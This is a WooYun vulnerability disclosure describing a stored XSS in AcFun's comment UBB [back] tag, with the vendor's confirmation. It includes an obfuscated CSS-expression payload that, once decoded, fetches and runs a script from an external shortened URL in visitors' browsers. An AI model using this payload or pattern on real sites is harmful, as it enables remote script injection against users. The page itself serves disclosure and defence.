当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038409

漏洞标题:ACFUN主站绕过过滤继续XSS -6

相关厂商:杭州游趣网络有限公司

漏洞作者: N1ghtBird

提交时间:2013-09-28 10:34

修复时间:2013-11-12 10:35

公开时间:2013-11-12 10:35

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-28: 细节已通知厂商并且等待厂商处理中
2013-09-29: 厂商已经确认,细节仅向厂商公开
2013-10-09: 细节向核心白帽子及相关领域专家公开
2013-10-19: 细节向普通白帽子公开
2013-10-29: 细节向实习白帽子公开
2013-11-12: 细节向公众公开

简要描述:

这次是评论的问题.

详细说明:

UBBJS

<script src="http://w5cdn.ranktv.cn/dotnet/20130418/ueditor/ubb.min.js"></script>



b = b.replace(/\[back\s*=\s*([^\]"]+?)(?:"[^\]]*?)?\s*\]/ig, '<span style="background-color:$1;">');


没有对内容进行有效过滤就带入标签。
exp:

[back=none;xss:expression(eval(String.fromCharCode(40,119,105,110,100,111,119,46,114,114,114,61,61,49,41,63,39,39,58,101,118,97,108,40,34,119,105,110,100,111,119,46,114,114,114,61,49,59,36,46,103,101,116,83,99,114,105,112,116,40,39,104,116,116,112,58,47,47,49,50,54,46,97,109,47,55,48,81,100,112,51,39,41,59,34,41,59)))] IE7 ONLY[/back]

漏洞证明:

20130928095728.png

修复方案:

虽然说是老问题..但是从效果来看影响还是蛮大的.过滤吧

版权声明:转载请注明来源 N1ghtBird@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-09-29 16:18

厂商回复:

感谢反馈。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-10-31 23:13 | Bantes ( 路人 | Rank:0 漏洞数:1 | 苦逼在校党一枚,偶尔挖点洞玩。)

    洞主工具可以分享不?

  2. 2013-10-31 23:22 | N1ghtBird ( 普通白帽子 | Rank:104 漏洞数:21 | _(:з」∠)_)

    @Bantes 自己写的SAE的PHP+Mysql,你要有的话私信我发你一份儿